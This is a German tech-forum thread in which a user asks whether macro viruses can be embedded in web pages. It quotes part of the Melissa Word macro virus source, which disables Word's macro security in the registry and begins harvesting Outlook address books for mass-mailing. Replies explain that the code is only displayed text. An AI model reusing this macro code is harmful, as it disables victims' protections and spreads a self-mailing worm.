ComputerBase Menü
Aktuelles

Macroviren in HTML-Seiten ???

Breaker

Breaker

Banned
Registriert
Feb. 2002
Beiträge
549
Ist es möglich Macroviren (oder den Melisa) in HTML-Seiten einzubauen (HTML-How-to) und beim aufrufen der Seite zu installieren / Starten ?

Habe mir gerade mit Donkey die Datei "Firewall Handbuch für LINUX 2.0 und 2.rar" gesaugt, mit Norton Antivirus gescannt, aber nichts gefunden, beim entpacken der Datei Meldet NAV das "schädlicher Code oder ein Virus" gefunden wurde :

Auszug aus der HTML-Seite :

Code: 
<P>
<BLOCKQUOTE><CODE>
<PRE>
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") &lt;> "" Then
  CommandBars("Macro").Controls("Security...").Enabled = False
  System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") = 1&amp;
Else
  CommandBars("Tools").Controls("Macro").Enabled = False
  Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 -
1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") &lt;> "... by
Kwyjibo" Then
  If UngaDasOutlook = "Outlook" Then
    DasMapiName.Logon "profile", "password"
    For y = 1 To DasMapiName.AddressLists.Count
        Set AddyBook = DasMapiName.AddressLists(y)
        x = 1
        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
        For oo = 1 To AddyBook.AddressEntries.Count
            Peep = AddyBook.AddressEntries(x)
            BreakUmOffASlice.Recipients.Add Peep

Wie muss ich das jetzt verstehen, wenn NAV erst beim entpacken etwas findet ? Kann NAV nicht in RAR oder ZIP-Archiven suchen ? Ist es wirklich möglich, ein derartigen Code in Webseiten einzubetten ?
 
hmm, ist das vbscript?
ich kann mir aber beim besten willen nicht vorstellen, dass man damit auf solche objekte zugriff hat (obwohl man beim ie ja nie ganz sicher sein kann...)

steffen, was sagst du dazu?

imo sieht es aber eher so aus, als ob der code nicht in die html eingebettet ist, sondern wirklicher, angezeigter inhalt...müsste wohl doch richtiger vb-code sein...

weird
 
also das Tag <code>formatiert den Text nur anders...

der autor hat wohl ein code sample in das tutorial eingebaut
und dein dummer Virenscanner interpretiert das falsch..
 
..ach ja und natürlich kann man viren in html einbetten
und dank java-script activex auf den rechner packen....
 
Und den neuesten Gack findet ihr hier :(

Also nicht wundern falls euch demnächst euer Internet Explorer
oder euer Outlook euch fragt ob es die Festplatte löschen darf :(

Ich werd mal wieder mein monatliches Backup vorbereiten ... :D
 
Hallo!

Ich habe versucht folgende Seite zu öffnen: http://www.slh-sternchen.de.vu/. Auf dieser Seite steht: "Vergeßt nicht Euch ins GB einzutragen, sonst ladet Ihr Euch automatisch einen Virus runter." Leider hat es mein (ich habe nicht allzuviel Ahnung und kann mir nicht merken wie die Dinger heißen) ... Server? .... nicht geschafft diese Seite vollständig zu öffnen. Naja egal, wie es nun richtig heißt, jedenfalls wurde die Seite nicht vollständig geöffnet. Habe ich mir da nun jetzt einen Virus runtergeladen? Und wenn ja, was muß ich da machen?

Herzliche Grüße

Roland
 
Original erstellt von Roland
Habe ich mir da nun jetzt einen Virus runtergeladen? Und wenn ja, was muß ich da machen?
Zum Vergrößern anklicken....
Du musst einen Virenscanner installieren.

Ich empfehle dir die Personal Edition von AntiVir.
Die guckst welche Version für dein Betriebssystem geeignet
ist und lädst sie dir runter.
Dann installierst du sie und lässt das Programm anschließend
deine Festplatte nach Viren absuchen.

Wenn das Programm einen findet weiß es automatisch
was es damit machen soll, es repariert die befallene Datei
und löscht den Virus ;)

Das Programm ist Freeware und sehr leicht zu bedienen.
Es schadet übrigens nicht alle 2 - 3 Tage nach einem Update
zu schauen.

Im Übrigen habe ich mir die von dir angegebene Site mal
angeschaut, das ist nur ein blöder Scherz der Macher mit dem
Virus, da besteht meines Erachtens keine Gefahr :)
 
Zuletzt bearbeitet:
Du musst dich einloggen oder registrieren, um hier zu antworten.

Ähnliche Themen

Reinhard77
Ich blicke in den PowerShell Abgrund..
Antworten
9
Aufrufe
778
Reinhard77
Reinhard77
skyward159
VBA-Makro - Zeilen aus Blatt 1 in Blatt 2 kopieren
Antworten
12
Aufrufe
823
duAffentier
duAffentier
A
Secure Erase stoppen
Antworten
9
Aufrufe
1.832
AlphaKaninchen
A
K
Heruntergefallene 2.5'' HDD noch verwenden?
Antworten
10
Aufrufe
830
Kurt Blahovec
K
N
Docker Container rootless betreiben
Antworten
1
Aufrufe
827
Sannyboy111985
Sannyboy111985
Zurück
Oben

Willkommen auf ComputerBase!

Mit Werbung weiterlesen

Besuche ComputerBase wie gewohnt mit Werbung und Tracking. Die Zustimmung ist jederzeit widerrufbar.

Details im Privacy Center und in der Liste unserer Partner. Ein Widerruf ist möglich in der Datenschutzerklärung.

… oder ComputerBase Pro bestellen

Nutze ComputerBase ohne Werbebanner, Video-Ads und Werbetracking schon für 4 €/Monat oder 36 €/Jahr.

Mehr zu ComputerBase Pro

Bereits Pro-Nutzer? Hier anmelden.

Tracking: Wir und unsere 165 Partner verarbeiten personenbezogene Daten, indem wir mit auf Ihrem Gerät gespeicherten Informationen (z. B. eindeutige Kennungen in Cookies) ein Nutzungsprofil erstellen, um z. B. Anzeigen zu personalisieren. Verarbeitungszwecke: Genaue Standortdaten und Abfrage von Geräteeigenschaften zur Identifikation, Informationen auf einem Gerät speichern und/oder abrufen, Personalisierte Anzeigen und Inhalte, Anzeigen- und Inhaltsmessungen, Erkenntnisse über Zielgruppen und Produktentwicklungen.

Impressum Kontakt Datenschutz